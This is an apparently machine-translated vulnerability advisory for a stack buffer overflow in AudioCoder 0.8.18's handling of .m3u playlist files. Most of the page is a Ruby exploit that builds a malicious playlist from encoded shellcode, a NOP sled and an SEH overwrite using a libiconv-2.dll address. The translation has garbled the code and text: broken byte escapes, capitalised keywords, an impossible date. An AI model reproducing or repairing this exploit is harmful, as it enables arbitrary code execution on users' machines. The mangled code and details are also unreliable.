AudioCoder '. m3u' File Buffer Overflow Vulnerability

Release date:
Updated on:

Affected Systems:
Mediaco der AudioCoder
Description:
--------------------------------------------------------------------------------
Bugtraq id: 59606
 
AudioCoder is a high-performance audio conversion tool developed based on the mediaco der core.
 
AudioCoder 0.8.18 has a boundary error when processing the playlist file. using a specially crafted M3U file, this vulnerability can cause stack buffer overflow and arbitrary code execution.
 
<* Source: metacom

Link: http://www.securelist.com/en/advisories/53256
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Metacom () provides the following test methods:
#! /Usr/bin/env ruby
# Exploit Title: AudioCoder 0.8.18 Buffer Overflow Exploit (SEH)
# Download link
: Http://www.mediacoderhq.com/getfile.htm? Site‑dl.mediaco derhq.com&file=audiocoder-0.8.18.exe
# Vulnerable Product: AudioCoder
# Date (found): 302.164.2013
# Date (publish): 01.05.2013
# RST
# Author: metacom
# Version: version 0.8.18
# Category: poc
# Tested on: windows 7 German
 
Begin
Shellcode =
"\ X89 \ xe0 \ xdb \ xc8 \ xd9 \ xf4 \ x5b \ x53 \ x59 \ x49 \ x49 \ x49 \ x49 \ x49" +
"\ X43 \ x43 \ x43 \ x43 \ x43 \ x43 \ x51 \ x5a \ x56 \ x54 \ x58 \ x33 \ x30 \ x56" +
"\ X58 \ x34 \ x41 \ x50 \ x30 \ x41 \ x33 \ x48 \ x48 \ x30 \ x41 \ x30 \ x30 \ x30 \ x41" +
"\ X42 \ x41 \ x41 \ x42 \ x54 \ x41 \ x41 \ x51 \ x32 \ x41 \ x42 \ x32 \ x42 \ x42" +
"\ X30 \ x42 \ x42 \ x58 \ x50 \ x38 \ x41 \ x43 \ x4a \ x4a \ x49 \ x4b \ x4c \ x4b" +
"\ X58 \ x4d \ x59 \ x53 \ x30 \ x55 \ x50 \ x53 \ x30 \ x43 \ x50 \ x4d \ x59 \ x5a" +
"\ X45 \ x56 \ x51 \ x58 \ x52 \ x52 \ x44 \ x4c \ x4b \ x50 \ x52 \ x56 \ x50 \ x4c" +
"\ X4b \ x50 \ x52 \ x54 \ x4c \ x4c \ x4b \ x31 \ x42 \ x45 \ x44 \ x4c \ x4b \ x34" +
"\ X32 \ x31 \ x38 \ x44 \ x4f \ x4f \ x47 \ x51 \ x5a \ x37 \ x56 \ x30 \ x31 \ x4b" +
"\ X4f \ x50 \ x31 \ x49 \ x50 \ x4e \ x4c \ x57 \ x4c \ x35 \ x31 \ x33 \ x4c \ x53" +
"\ X32 \ x56 \ x4c \ x37 \ x50 \ x49 \ x51 \ x38 \ x4f \ x54 \ x4d \ x35 \ x51 \ x49" +
"\ X57 \ x4d \ x32 \ x5a \ x50 \ x36 \ x32 \ x36 \ x37 \ x4c \ x4b \ x46 \ x32 \ x54" +
"\ X50 \ x4c \ x4b \ x47 \ x32 \ x37 \ x4c \ x53 \ x31 \ x4e \ x30 \ x4c \ x4b \ x47" +
"\ X30 \ x54 \ x38 \ x4b \ x35 \ x49 \ x50 \ x42 \ x54 \ x51 \ x5a \ x35 \ x51 \ x4e" +
"\ X30 \ x50 \ x50 \ x4c \ x4b \ x57 \ x38 \ x55 \ x48 \ x4c \ x4b \ x36 \ x38 \ x31" +
"\ X30 \ x45 \ x51 \ x59 \ x43 \ x4b \ x53 \ x57 \ x4c \ x30 \ x49 \ x4c \ x4b \ x30" +
"\ X34 \ x4c \ x4b \ x55 \ x51 \ x4e \ x36 \ x30 \ x31 \ x4b \ x4f \ x50 \ x31 \ x49" +
"\ X50 \ x4e \ x4c \ x39 \ x51 \ x48 \ x4f \ x34 \ x4d \ x43 \ x31 \ x49 \ x57 \ x46" +
"\ X58 \ x4b \ x50 \ x42 \ x55 \ x5a \ x54 \ x43 \ x33 \ x43 \ x4d \ x5a \ x58 \ x37" +
"\ X4b \ x33 \ x4d \ x57 \ x54 \ x53 \ x45 \ x4a \ x42 \ x30 \ x58 \ x4c \ x4b \ x56" +
"\ X38 \ x36 \ x44 \ x43 \ x31 \ x48 \ x53 \ x35 \ x36 \ x4c \ x4b \ x54 \ x4c \ x30" +
"\ X4b \ x4c \ x4b \ x56 \ x38 \ x45 \ x4c \ x53 \ x31 \ x39 \ x43 \ x4c \ x4b \ x54" +
"\ X44 \ x4c \ x4b \ x35 \ x51 \ x4e \ x30 \ x4b \ x39 \ x51 \ x54 \ x31 \ x34 \ x37" +
"\ X54 \ x51 \ x4b \ x51 \ x4b \ x55 \ x31 \ x30 \ x59 \ x30 \ x5a \ x46 \ x31 \ x4b" +
"\ X4f \ x4d \ x30 \ x31 \ x48 \ x51 \ x4f \ x50 \ x5a \ x4c \ x4b \ x42 \ x32 \ x4a" +
"\ X4b \ x4b \ x36 \ x51 \ x4d \ x52 \ x4a \ x43 \ x31 \ x4c \ x4d \ x4c \ x45 \ x48" +
"\ X39 \ x55 \ x50 \ x55 \ x50 \ x53 \ x30 \ x50 \ x50 \ x43 \ x58 \ x36 \ x51 \ x4c" +
"\ X4b \ x32 \ x4f \ x4d \ x57 \ x4b \ x4f \ x39 \ x45 \ x4f \ x4b \ x4c \ x30 \ x48" +
"\ X35 \ x39 \ x32 \ x56 \ x36 \ x53 \ x58 \ x59 \ x36 \ x5a \ x35 \ x4f \ x4d \ x4d" +
"\ X4d \ x4b \ x4f \ x38 \ x55 \ x57 \ x4c \ x35 \ x56 \ x33 \ x4c \ x44 \ x4a \ x4b" +
"\ X30 \ x4b \ x4b \ x4d \ x30 \ x33 \ x45 \ x54 \ x45 \ x4f \ x4b \ x50 \ x47 \ x42" +
"\ X33 \ x33 \ x42 \ x42 \ x4f \ x42 \ x4a \ x43 \ x30 \ x31 \ x43 \ x4b \ x4f \ x59" +
"\ X45 \ x32 \ x43 \ x43 \ x51 \ x42 \ x4c \ x33 \ x53 \ x36 \ x4e \ x43 \ x55 \ x43" +
"\ X48 \ x55 \ x35 \ x43 \ x30 \ x41 \ x41"

File = "fuzz. m3u"
Head = "http ://"
Junk = "\ x90" * 765 # Distance to overwrite EIP
Nseh = "\ xEB \ x06 \ x90 \ x90" # Short (6 bytes) jump!
Seh = "\ xEE \ x04 \ x01 \ x66" # pop ecx/RETN from
Libiconv-2.dll
Nops = "\ x90" * 80
Textfile = open (file, 'w ')
Textfile. write (head + junk + nseh + seh + nops + shellcode)
Textfile. close ()
 
Puts
Puts "Vulnerable file created !... \ N"
 
End

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
Mediaco der
----------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
 
Http://mediacoder.com.cn/